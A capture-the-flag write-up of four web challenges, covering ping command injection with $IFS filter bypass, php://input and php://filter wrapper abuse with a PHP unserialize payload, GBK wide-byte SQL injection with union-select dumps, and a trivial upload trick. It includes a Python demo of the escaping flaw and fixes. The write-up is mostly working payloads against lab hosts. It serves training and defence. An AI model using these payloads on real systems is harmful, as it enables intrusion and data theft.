This was an internal qualifier for a certain group ahead of a "Craftsman Cup" competition. I had nothing better to do, so I took a quick look at the web challenges and kept a short record.
Web 1: ping command injection
1. Judging from the request, the ip parameter is passed to a shell command. There is some filtering, but it is incomplete: ip=127.0.0.1|ls&submit=PING works. (My guess is that the filter is written the same way as the DVWA command-execution example, '| ' => '', and because of the trailing space a bare | without a space is not removed.)
Build a POST with ip=127.0.0.1|ls&submit=PING and flag.php shows up in the listing.
2. Then ip=127.0.0.1|pwd&submit=PING gives the path /var/www/html.
3. Read it directly. Spaces turn out to be filtered as well, so $IFS is used in place of the space. Payload: ip=127.0.0.1|cat$IFS/var/www/html/flag.php&submit=PING returns the flag.
Web 2: PHP wrappers and unserialize
1. Visiting the given address directly shows a hint in an HTML comment:
you are not admin !
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!
";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
-->
2. From this commented code we can see that three parameters are taken: user, file and pass.
The condition to get past is if(isset($user)&&(file_get_contents($user,'r')==="the user is admin"))
In other words, the content read from the user parameter must equal the user is admin.
From the comment in the hint, file = class.php.
pass has no meaning in the hinted code, so it can be ignored for now.
To get past the check, the first thing that comes to mind is the php://input wrapper.
Build the POST request as follows:
POST /?user=php://input&file=class.php HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17
the user is admin
Next we need to include class.php. We don't know where it is, so use another PHP wrapper, php://filter, which lets us read arbitrary files.
Usage: php://filter/convert.base64-encode/resource=index.php
This returns the content of index.php base64-encoded (so include() returns the source instead of executing it).
POST /?user=php://input&file=php://filter/convert.base64-encode/resource=class.php HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17
the user is admin
PD9waHAKCmNsYXNzIFJlYWR7Ly9mMWFnLnBocAogICAgcHVibGljICRmaWxlOwogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9TdHJpbmcoKXsKICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpewogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsKICAgICAgICB9CiAgICAgICAgcmV0dXJuICJfX3RvU3RyaW5nIHdhcyBjYWxsZWQhIjsKICAgIH0KfQo/Pgo=
base64-decoding it gives the following code:
<?php
class Read{
    //f1ag.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
        return "__toString was called!";
    }
}
?>
From this we can build a serialized Read object for the pass parameter (the __toString() method reads $file when the object is used as a string). The full request:
POST /?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=f1ag.php";} HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17
the user is admin
base64-decode the response to get the flag.
Web 3: SQL injection
Challenge description: parameter id
Visiting sql1.php directly shows garbled characters; together with the hint about id, I guessed this might be a wide-byte injection.
Testing confirmed that it is.
1. Confirm the injection:
http://192.168.1.1:3036/sql1.php?id=%df'
2. Get the database name and tables:
http://192.168.1.1:3036/sql1.php?id=%df%27%20union%20select%201,%20database()%23
gives the database pwnhubsql1
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()%23
gives two tables: article, flag
3. Dump the columns
From the table names the flag is presumably in the flag table; the table name is given in hex here (0x666c6167 = flag) so that no quotes are needed.
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x666c6167%23
gives the columns id, thisisflag
4. Read the flag (hex-encoded):
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,hex(group_concat(thisisflag))%20from%20flag%23
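Added example (not from the writeup) showing why the %df' probe above defeats byte-wise escaping once the connection charset is GBK, and the two fixes a defender wants: charset-aware handling that rejects malformed bytes, and a type check on id. The sample byte string is constructed and the function names are my own.

```python
import re

# Constructed sample: the %df' probe from the writeup as raw bytes.
PROBE = b"\xdf'"

def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP addslashes()/magic_quotes: a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # backslash
        out.append(b)
    return bytes(out)

def live_quote(escaped: bytes, charset: str) -> bool:
    """Decode the escaped bytes the way the server does and report whether a bare ' survives."""
    text = escaped.decode(charset, errors="replace")
    return re.search(r"(?<!\\)'", text) is not None

def escape_or_reject(data: bytes, charset: str):
    """Charset-aware escaping: decode first, escape per character, and refuse malformed input."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError:
        return None  # 0xDF followed by 0x27 is not valid GBK; do not let it reach the query
    return re.sub(r"(['\"\\\x00])", r"\\\1", text).encode(charset)

def safe_id(raw: bytes):
    """For an id parameter the real fix is a type check (or a bound parameter), not escaping."""
    return int(raw) if re.fullmatch(rb"[0-9]{1,10}", raw) else None

if __name__ == "__main__":
    esc = addslashes(PROBE)
    # 0xDF 0x5C is read as one GBK character, so the backslash is swallowed and the ' is free
    print(esc, "as gbk ->", esc.decode("gbk", "replace"))
    print("live quote under gbk:", live_quote(esc, "gbk"))      # True
    print("live quote under utf-8:", live_quote(esc, "utf-8"))  # False
    print("charset-aware escape:", escape_or_reject(PROBE, "gbk"))  # None (rejected)
    print("safe_id:", safe_id(b"1"), safe_id(PROBE))             # 1 None
```

The same mechanism is why a real connection should set its charset on the driver (so the escaping routine knows the encoding) or, better, bind parameters.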
Web 4: file upload
This one is just silly.
1. Upload any image; the response says it wants a give_me_flag.php before it will give you the flag!
2. So rename the file to give_me_flag.php and the flag comes back.
Overall the challenges were easy, nothing particularly hard, just something to play with. Emmm, that's it.